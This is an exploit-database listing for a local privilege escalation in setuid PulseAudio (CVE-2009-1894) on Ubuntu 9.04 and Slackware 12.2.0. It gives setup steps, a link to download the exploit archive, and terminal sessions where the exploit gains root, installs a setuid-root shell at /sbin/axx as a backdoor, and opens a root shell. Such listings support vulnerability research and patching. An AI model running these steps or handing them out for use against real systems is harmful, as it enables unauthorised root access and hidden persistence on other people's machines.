PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

Author: anonymous
type: local
platform: linux
port: 
date_added: 2009-07-19 
date_updated:  
verified: 1 
codes: CVE-2009-1894 
tags: 
aliases: 2009-pulseaudio-exp.tar.gz 
screenshot_url:  
application_url: 

PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and
Yorick Koster
--

Put files in /tmp/pulseaudio-exp (or change config.h). Must be on
same fs as the pulseaudio binary.

Goes faster if you already have a pulseaudio running ? :p

Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0
(x86)

Ubuntu:
------------------------------------
$ ./c.sh
$ ./pulseaudio-exp
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm
in),122(sambashare)
# uname -a
Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12
UTC 2009 x86_64 GNU/Linux
------------------------------------
Slackware
------------------------------------
$ ./c.sh
$ ./pulseaudio-exp
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
sh-3.1# id
uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt)
sh-3.1# uname -a
Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008
i686 Intel(R) Pentium(R) Dual  CPU  T3400  @ 2.16GHz
GenuineIntel GNU/Linux
------------------------------------

download:  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)

# milw0rm.com [2009-07-20]